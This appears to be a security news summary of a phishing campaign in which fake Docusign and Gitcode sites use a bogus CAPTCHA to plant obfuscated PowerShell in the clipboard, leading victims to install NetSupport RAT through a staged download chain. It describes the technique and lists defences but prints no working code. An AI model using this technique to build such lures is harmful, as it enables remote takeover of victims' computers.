The Clipboard Falls in the (Net)Support Scam

What if solving a CAPTCHA meant handing over your system? A new phishing campaign weaponizes trust in everyday platforms by silently injecting malware commands into the clipboard, tricking users into executing them via the Run prompt. The result: full remote access for attackers through a stealthy multi-stage delivery of NetSupport RAT.

The campaign uses fake websites impersonating Gitcode and Docusign—two platforms perceived as safe and widely used. Social engineering does the rest: users are led to these sites through phishing emails or malicious online ads and are asked to prove they’re human by completing a CAPTCHA.

But this CAPTCHA hides a trick. Once solved, it secretly copies an obfuscated PowerShell command to the user’s clipboard—a technique known as clipboard poisoning. The page then instructs the user to open the Windows Run dialog (Win + R), paste the code (Ctrl + V), and press Enter. With that, the malware begins its silent journey.

Multi-Stage Infection in the Shadows

Behind the scenes, the attack unfolds in three chained PowerShell scripts. Each stage fetches the next from remote servers, eventually downloading and executing a malicious payload. Among these:

• First Stage: The initial PowerShell script is copied via clipboard and executed by the victim.

• Second Stage: This script downloads another PowerShell loader, which checks in with a fake verification page hosted on a domain like docusign.sa[.]com.

• Third Stage: The next script retrieves a ZIP file containing jp2launcher.exe, a renamed executable that ultimately installs NetSupport RAT, a legitimate remote support tool now used for remote access trojan (RAT) purposes.

The script also tries to download wbdims.exe from GitHub to establish persistence, ensuring the malware is relaunched every time the user logs in.

Who Falls for It

The victims are mostly non-technical Windows users—individuals who rely on trusted platforms for signing documents, managing projects, or collaborating in development environments. By exploiting visual familiarity and mimicking known brands, the attackers bypass skepticism and security awareness.

The campaign’s sophistication lies not in technical novelty, but in psychological manipulation: trust is hijacked, interfaces are imitated, and basic user actions—solving a CAPTCHA, pasting into Run—are weaponized.

Measures to Fend Off the Trap

To defend against clipboard-based multi-stage attacks like this one, organizations and individuals should implement the following safeguards:

• Block PowerShell execution from clipboard-injected sources using endpoint protection tools with script behavior analysis.

• Flag clipboard changes that occur immediately after CAPTCHA checks or site interaction—especially on domains mimicking known brands.

• Restrict PowerShell execution to administrative use only and log all script executions on endpoints.

• Monitor and block traffic to suspicious domains that spoof DevOps tools or document-sharing services (e.g., docusign.sa[.]com).

• Train users to never paste or run code copied from the browser into Win + R or terminal windows, especially if prompted by unfamiliar pages.

• Use browser-based defenses that warn against clipboard manipulation or block access to known phishing infrastructure.

The NetSupport RAT is not new—but the way it’s delivered here is creative, evasive, and deeply reliant on human error. Security isn’t just about stopping code; it’s about understanding trust, interaction, and the subtle ways both can be turned against us.

https://thehackernews.com/2025/06/fake-docusign-gitcode-sites-spread.html?m=1